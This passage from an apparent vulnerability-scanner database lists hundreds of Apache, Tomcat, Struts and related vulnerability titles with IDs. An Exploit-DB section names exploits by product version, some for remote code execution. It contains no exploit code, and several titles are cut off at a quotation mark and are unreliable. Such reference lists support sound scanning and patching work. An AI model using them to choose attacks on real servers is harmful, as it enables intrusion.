14918| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
14919| [60264] Apache Tomcat Transfer-Encoding denial of service
14920| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
14921| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
14922| [59413] Apache mod_proxy_http timeout information disclosure
14923| [59058] Apache MyFaces unencrypted view state cross-site scripting
14924| [58827] Apache Axis2 xsd file include
14925| [58790] Apache Axis2 modules cross-site scripting
14926| [58299] Apache ActiveMQ queueBrowse cross-site scripting
14927| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
14928| [58056] Apache ActiveMQ .jsp source code disclosure
14929| [58055] Apache Tomcat realm name information disclosure
14930| [58046] Apache HTTP Server mod_auth_shadow security bypass
14931| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
14932| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
14933| [57429] Apache CouchDB algorithms information disclosure
14934| [57398] Apache ActiveMQ Web console cross-site request forgery
14935| [57397] Apache ActiveMQ createDestination.action cross-site scripting
14936| [56653] Apache HTTP Server DNS spoofing
14937| [56652] Apache HTTP Server DNS cross-site scripting
14938| [56625] Apache HTTP Server request header information disclosure
14939| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
14940| [56623] Apache HTTP Server mod_proxy_ajp denial of service
14941| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
14942| [55857] Apache Tomcat WAR files directory traversal
14943| [55856] Apache Tomcat autoDeploy attribute security bypass
14944| [55855] Apache Tomcat WAR directory traversal
14945| [55210] Intuit component for Joomla! Apache information disclosure
14946| [54533] Apache Tomcat 404 error page cross-site scripting
14947| [54182] Apache Tomcat admin default password
14948| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
14949| [53666] Apache HTTP Server Solaris pollset support denial of service
14950| [53650] Apache HTTP Server HTTP basic-auth module security bypass
14951| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
14952| [53041] mod_proxy_ftp module for Apache denial of service
14953| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
14954| [51953] Apache Tomcat Path Disclosure
14955| [51952] Apache Tomcat Path Traversal
14956| [51951] Apache stronghold-status Information Disclosure
14957| [51950] Apache stronghold-info Information Disclosure
14958| [51949] Apache PHP Source Code Disclosure
14959| [51948] Apache Multiviews Attack
14960| [51946] Apache JServ Environment Status Information Disclosure
14961| [51945] Apache error_log Information Disclosure
14962| [51944] Apache Default Installation Page Pattern Found
14963| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
14964| [51942] Apache AXIS XML External Entity File Retrieval
14965| [51941] Apache AXIS Sample Servlet Information Leak
14966| [51940] Apache access_log Information Disclosure
14967| [51626] Apache mod_deflate denial of service
14968| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
14969| [51365] Apache Tomcat RequestDispatcher security bypass
14970| [51273] Apache HTTP Server Incomplete Request denial of service
14971| [51195] Apache Tomcat XML information disclosure
14972| [50994] Apache APR-util xml/apr_xml.c denial of service
14973| [50993] Apache APR-util apr_brigade_vprintf denial of service
14974| [50964] Apache APR-util apr_strmatch_precompile() denial of service
14975| [50930] Apache Tomcat j_security_check information disclosure
14976| [50928] Apache Tomcat AJP denial of service
14977| [50884] Apache HTTP Server XML ENTITY denial of service
14978| [50808] Apache HTTP Server AllowOverride privilege escalation
14979| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
14980| [50059] Apache mod_proxy_ajp information disclosure
14981| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
14982| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
14983| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
14984| [49921] Apache ActiveMQ Web interface cross-site scripting
14985| [49898] Apache Geronimo Services/Repository directory traversal
14986| [49725] Apache Tomcat mod_jk module information disclosure
14987| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
14988| [49712] Apache Struts unspecified cross-site scripting
14989| [49213] Apache Tomcat cal2.jsp cross-site scripting
14990| [48934] Apache Tomcat POST doRead method information disclosure
14991| [48211] Apache Tomcat header HTTP request smuggling
14992| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
14993| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
14994| [47709] Apache Roller "
14995| [47104] Novell Netware ApacheAdmin console security bypass
14996| [47086] Apache HTTP Server OS fingerprinting unspecified
14997| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
14998| [45791] Apache Tomcat RemoteFilterValve security bypass
14999| [44435] Oracle WebLogic Apache Connector buffer overflow
15000| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15001| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15002| [44156] Apache Tomcat RequestDispatcher directory traversal
15003| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15004| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15005| [42987] Apache HTTP Server mod_proxy module denial of service
15006| [42915] Apache Tomcat JSP files path disclosure
15007| [42914] Apache Tomcat MS-DOS path disclosure
15008| [42892] Apache Tomcat unspecified unauthorized access
15009| [42816] Apache Tomcat Host Manager cross-site scripting
15010| [42303] Apache 403 error cross-site scripting
15011| [41618] Apache-SSL ExpandCert() authentication bypass
15012| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15013| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15014| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15015| [40562] Apache Geronimo init information disclosure
15016| [40478] Novell Web Manager webadmin-apache.conf security bypass
15017| [40411] Apache Tomcat exception handling information disclosure
15018| [40409] Apache Tomcat native (APR based) connector weak security
15019| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15020| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15021| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15022| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15023| [39804] Apache Tomcat SingleSignOn information disclosure
15024| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15025| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15026| [39608] Apache HTTP Server balancer manager cross-site request forgery
15027| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15028| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15029| [39472] Apache HTTP Server mod_status cross-site scripting
15030| [39201] Apache Tomcat JULI logging weak security
15031| [39158] Apache HTTP Server Windows SMB shares information disclosure
15032| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15033| [38951] Apache::AuthCAS Perl module cookie SQL injection
15034| [38800] Apache HTTP Server 413 error page cross-site scripting
15035| [38211] Apache Geronimo SQLLoginModule authentication bypass
15036| [37243] Apache Tomcat WebDAV directory traversal
15037| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15038| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15039| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15040| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15041| [36782] Apache Geronimo MEJB unauthorized access
15042| [36586] Apache HTTP Server UTF-7 cross-site scripting
15043| [36468] Apache Geronimo LoginModule security bypass
15044| [36467] Apache Tomcat functions.jsp cross-site scripting
15045| [36402] Apache Tomcat calendar cross-site request forgery
15046| [36354] Apache HTTP Server mod_proxy module denial of service
15047| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15048| [36336] Apache Derby lock table privilege escalation
15049| [36335] Apache Derby schema privilege escalation
15050| [36006] Apache Tomcat "
15051| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15052| [35999] Apache Tomcat \"
15053| [35795] Apache Tomcat CookieExample cross-site scripting
15054| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15055| [35384] Apache HTTP Server mod_cache module denial of service
15056| [35097] Apache HTTP Server mod_status module cross-site scripting
15057| [35095] Apache HTTP Server Prefork MPM module denial of service
15058| [34984] Apache HTTP Server recall_headers information disclosure
15059| [34966] Apache HTTP Server MPM content spoofing
15060| [34965] Apache HTTP Server MPM information disclosure
15061| [34963] Apache HTTP Server MPM multiple denial of service
15062| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15063| [34869] Apache Tomcat JSP example Web application cross-site scripting
15064| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15065| [34496] Apache Tomcat JK Connector security bypass
15066| [34377] Apache Tomcat hello.jsp cross-site scripting
15067| [34212] Apache Tomcat SSL configuration security bypass
15068| [34210] Apache Tomcat Accept-Language cross-site scripting
15069| [34209] Apache Tomcat calendar application cross-site scripting
15070| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15071| [34167] Apache Axis WSDL file path disclosure
15072| [34068] Apache Tomcat AJP connector information disclosure
15073| [33584] Apache HTTP Server suEXEC privilege escalation
15074| [32988] Apache Tomcat proxy module directory traversal
15075| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15076| [32708] Debian Apache tty privilege escalation
15077| [32441] ApacheStats extract() PHP call unspecified
15078| [32128] Apache Tomcat default account
15079| [31680] Apache Tomcat RequestParamExample cross-site scripting
15080| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15081| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15082| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15083| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15084| [29550] Apache mod_tcl set_var() format string
15085| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15086| [28357] Apache HTTP Server mod_alias script source information disclosure
15087| [28063] Apache mod_rewrite off-by-one buffer overflow
15088| [27902] Apache Tomcat URL information disclosure
15089| [26786] Apache James SMTP server denial of service
15090| [25680] libapache2 /tmp/svn file upload
15091| [25614] Apache Struts lookupMap cross-site scripting
15092| [25613] Apache Struts ActionForm denial of service
15093| [25612] Apache Struts isCancelled() security bypass
15094| [24965] Apache mod_python FileSession command execution
15095| [24716] Apache James spooler memory leak denial of service
15096| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15097| [24158] Apache Geronimo jsp-examples cross-site scripting
15098| [24030] Apache auth_ldap module multiple format strings
15099| [24008] Apache mod_ssl custom error message denial of service
15100| [24003] Apache mod_auth_pgsql module multiple syslog format strings
15101| [23612] Apache mod_imap referer field cross-site scripting
15102| [23173] Apache Struts error message cross-site scripting
15103| [22942] Apache Tomcat directory listing denial of service
15104| [22858] Apache Multi-Processing Module code allows denial of service
15105| [22602] RHSA-2005:582 updates for Apache httpd not installed
15106| [22520] Apache mod-auth-shadow "
15107| [22466] ApacheTop symlink
15108| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15109| [22006] Apache HTTP Server byte-range filter denial of service
15110| [21567] Apache mod_ssl off-by-one buffer overflow
15111| [21195] Apache HTTP Server header HTTP request smuggling
15112| [20383] Apache HTTP Server htdigest buffer overflow
15113| [19681] Apache Tomcat AJP12 request denial of service
15114| [18993] Apache HTTP server check_forensic symlink attack
15115| [18790] Apache Tomcat Manager cross-site scripting
15116| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15117| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15118| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15119| [17961] Apache Web server ServerTokens has not been set
15120| [17930] Apache HTTP Server HTTP GET request denial of service
15121| [17785] Apache mod_include module buffer overflow
15122| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15123| [17473] Apache HTTP Server Satisfy directive allows access to resources
15124| [17413] Apache htpasswd buffer overflow
15125| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15126| [17382] Apache HTTP Server IPv6 apr_util denial of service
15127| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15128| [17273] Apache HTTP Server speculative mode denial of service
15129| [17200] Apache HTTP Server mod_ssl denial of service
15130| [16890] Apache HTTP Server server-info request has been detected
15131| [16889] Apache HTTP Server server-status request has been detected
15132| [16705] Apache mod_ssl format string attack
15133| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15134| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15135| [16230] Apache HTTP Server PHP denial of service
15136| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15137| [15958] Apache HTTP Server authentication modules memory corruption
15138| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15139| [15540] Apache HTTP Server socket starvation denial of service
15140| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15141| [15422] Apache HTTP Server mod_access information disclosure
15142| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15143| [15293] Apache for Cygwin "
15144| [15065] Apache-SSL has a default password
15145| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15146| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15147| [14751] Apache Mod_python output filter information disclosure
15148| [14125] Apache HTTP Server mod_userdir module information disclosure
15149| [14075] Apache HTTP Server mod_php file descriptor leak
15150| [13703] Apache HTTP Server account
15151| [13689] Apache HTTP Server configuration allows symlinks
15152| [13688] Apache HTTP Server configuration allows SSI
15153| [13687] Apache HTTP Server Server: header value
15154| [13685] Apache HTTP Server ServerTokens value
15155| [13684] Apache HTTP Server ServerSignature value
15156| [13672] Apache HTTP Server config allows directory autoindexing
15157| [13671] Apache HTTP Server default content
15158| [13670] Apache HTTP Server config file directive references outside content root
15159| [13668] Apache HTTP Server httpd not running in chroot environment
15160| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15161| [13664] Apache HTTP Server config file contains ScriptAlias entry
15162| [13663] Apache HTTP Server CGI support modules loaded
15163| [13661] Apache HTTP Server config file contains AddHandler entry
15164| [13660] Apache HTTP Server 500 error page not CGI script
15165| [13659] Apache HTTP Server 413 error page not CGI script
15166| [13658] Apache HTTP Server 403 error page not CGI script
15167| [13657] Apache HTTP Server 401 error page not CGI script
15168| [13552] Apache HTTP Server mod_cgid module information disclosure
15169| [13550] Apache GET request directory traversal
15170| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15171| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15172| [13429] Apache Tomcat non-HTTP request denial of service
15173| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15174| [13295] Apache weak password encryption
15175| [13254] Apache Tomcat .jsp cross-site scripting
15176| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15177| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15178| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15179| [12662] Apache HTTP Server rotatelogs denial of service
15180| [12554] Apache Tomcat stores password in plain text
15181| [12553] Apache HTTP Server redirects and subrequests denial of service
15182| [12552] Apache HTTP Server FTP proxy server denial of service
15183| [12551] Apache HTTP Server prefork MPM denial of service
15184| [12550] Apache HTTP Server weaker than expected encryption
15185| [12549] Apache HTTP Server type-map file denial of service
15186| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15187| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15188| [12091] Apache HTTP Server apr_password_validate denial of service
15189| [12090] Apache HTTP Server apr_psprintf code execution
15190| [11804] Apache HTTP Server mod_access_referer denial of service
15191| [11750] Apache HTTP Server could leak sensitive file descriptors
15192| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15193| [11703] Apache long slash path allows directory listing
15194| [11695] Apache HTTP Server LF (Line Feed) denial of service
15195| [11694] Apache HTTP Server filestat.c denial of service
15196| [11438] Apache HTTP Server MIME message boundaries information disclosure
15197| [11412] Apache HTTP Server error log terminal escape sequence injection
15198| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15199| [11195] Apache Tomcat web.xml could be used to read files
15200| [11194] Apache Tomcat URL appended with a null character could list directories
15201| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15202| [11126] Apache HTTP Server illegal character file disclosure
15203| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15204| [11124] Apache HTTP Server DOS device name denial of service
15205| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15206| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15207| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15208| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15209| [10499] Apache HTTP Server WebDAV HTTP POST view source
15210| [10457] Apache HTTP Server mod_ssl "
15211| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15212| [10414] Apache HTTP Server htdigest multiple buffer overflows
15213| [10413] Apache HTTP Server htdigest temporary file race condition
15214| [10412] Apache HTTP Server htpasswd temporary file race condition
15215| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15216| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15217| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15218| [10280] Apache HTTP Server shared memory scorecard overwrite
15219| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15220| [10241] Apache HTTP Server Host: header cross-site scripting
15221| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15222| [10208] Apache HTTP Server mod_dav denial of service
15223| [10206] HP VVOS Apache mod_ssl denial of service
15224| [10200] Apache HTTP Server stderr denial of service
15225| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15226| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15227| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15228| [10098] Slapper worm targets OpenSSL/Apache systems
15229| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15230| [9875] Apache HTTP Server .var file request could disclose installation path
15231| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15232| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15233| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15234| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15235| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15236| [9396] Apache Tomcat null character to threads denial of service
15237| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15238| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15239| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15240| [8932] Apache Tomcat example class information disclosure
15241| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15242| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15243| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15244| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15245| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15246| [8400] Apache HTTP Server mod_frontpage buffer overflows
15247| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15248| [8308] Apache "
15249| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15250| [8119] Apache and PHP OPTIONS request reveals "
15251| [8054] Apache is running on the system
15252| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15253| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15254| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15255| [7836] Apache HTTP Server log directory denial of service
15256| [7815] Apache for Windows "
15257| [7810] Apache HTTP request could result in unexpected behavior
15258| [7599] Apache Tomcat reveals installation path
15259| [7494] Apache "
15260| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15261| [7363] Apache Web Server hidden HTTP requests
15262| [7249] Apache mod_proxy denial of service
15263| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15264| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15265| [7059] Apache "
15266| [7057] Apache "
15267| [7056] Apache "
15268| [7055] Apache "
15269| [7054] Apache "
15270| [6997] Apache Jakarta Tomcat error message may reveal information
15271| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15272| [6970] Apache crafted HTTP request could reveal the internal IP address
15273| [6921] Apache long slash path allows directory listing
15274| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15275| [6527] Apache Web Server for Windows and OS2 denial of service
15276| [6316] Apache Jakarta Tomcat may reveal JSP source code
15277| [6305] Apache Jakarta Tomcat directory traversal
15278| [5926] Linux Apache symbolic link
15279| [5659] Apache Web server discloses files when used with php script
15280| [5310] Apache mod_rewrite allows attacker to view arbitrary files
15281| [5204] Apache WebDAV directory listings
15282| [5197] Apache Web server reveals CGI script source code
15283| [5160] Apache Jakarta Tomcat default installation
15284| [5099] Trustix Secure Linux installs Apache with world writable access
15285| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
15286| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
15287| [4931] Apache source.asp example file allows users to write to files
15288| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
15289| [4205] Apache Jakarta Tomcat delivers file contents
15290| [2084] Apache on Debian by default serves the /usr/doc directory
15291| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
15292| [697] Apache HTTP server beck exploit
15293| [331] Apache cookies buffer overflow
15294|
15295| Exploit-DB - https://www.exploit-db.com:
15296| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
15297| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15298| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15299| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
15300| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
15301| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
15302| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
15303| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
15304| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
15305| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15306| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
15307| [29859] Apache Roller OGNL Injection
15308| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
15309| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
15310| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
15311| [29290] Apache / PHP 5.x Remote Code Execution Exploit
15312| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
15313| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
15314| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
15315| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
15316| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
15317| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
15318| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
15319| [27096] Apache Geronimo 1.0 Error Page XSS
15320| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
15321| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
15322| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
15323| [25986] Plesk Apache Zeroday Remote Exploit
15324| [25980] Apache Struts includeParams Remote Code Execution
15325| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
15326| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
15327| [24874] Apache Struts ParametersInterceptor Remote Code Execution
15328| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
15329| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
15330| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
15331| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
15332| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
15333| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
15334| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
15335| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
15336| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
15337| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
15338| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
15339| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
15340| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
15341| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
15342| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
15343| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
15344| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15345| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
15346| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
15347| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15348| [21719] Apache 2.0 Path Disclosure Vulnerability
15349| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15350| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
15351| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
15352| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
15353| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
15354| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
15355| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
15356| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
15357| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
15358| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
15359| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
15360| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
15361| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
15362| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
15363| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
15364| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
15365| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
15366| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
15367| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
15368| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
15369| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
15370| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
15371| [20558] Apache 1.2 Web Server DoS Vulnerability
15372| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
15373| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
15374| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
15375| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
15376| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
15377| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
15378| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
15379| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
15380| [19231] PHP apache_request_headers Function Buffer Overflow
15381| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
15382| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
15383| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
15384| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
15385| [18442] Apache httpOnly Cookie Disclosure
15386| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
15387| [18221] Apache HTTP Server Denial of Service
15388| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
15389| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
15390| [17691] Apache Struts < 2.2.0 - Remote Command Execution
15391| [16798] Apache mod_jk 1.2.20 Buffer Overflow
15392| [16782] Apache Win32 Chunked Encoding
15393| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
15394| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
15395| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
15396| [15319] Apache 2.2 (Windows) Local Denial of Service
15397| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
